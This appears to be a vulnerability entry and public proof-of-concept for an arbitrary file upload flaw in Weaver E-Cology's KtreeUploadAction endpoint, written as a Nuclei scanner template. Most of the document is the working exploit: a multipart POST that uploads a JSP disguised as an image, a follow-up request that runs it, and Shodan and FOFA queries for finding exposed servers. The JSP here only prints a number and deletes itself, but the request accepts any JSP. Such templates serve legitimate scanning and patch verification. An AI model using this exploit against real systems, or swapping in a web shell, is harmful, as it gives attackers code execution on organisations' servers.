漏洞描述
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
weaver-ktreeuploadaction-file-upload: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
PoC代码[已公开]
id: weaver-ktreeuploadaction-file-upload
info:
name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
reference:
- https://buaq.net/go-117479.html
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
product: e-cology
vendor: weaver
tags: weaver,ecology,fileupload,intrusive
variables:
num1: "{{rand_int(40000, 50000)}}"
num2: "{{rand_int(40000, 50000)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@timeout: 20s
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
@timeout: 20s
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
- "contains(body_2, '{{result}}') && status_code_2 == 200"
condition: and
extractors:
- type: regex
name: filename
group: 1
regex:
- "','url':'(.*?)','title"
internal: true
# digest: 490a0046304402205f12787dd9998f29f1a92a8ea1ad42953ad5cf396a6a2abc30f67c324728c58002204f21d3c9bea7cead7c44ca5ac71a6c0e3e795794a09f96820defa6df04acce74:922c64590222798bb761d5b6d8e72950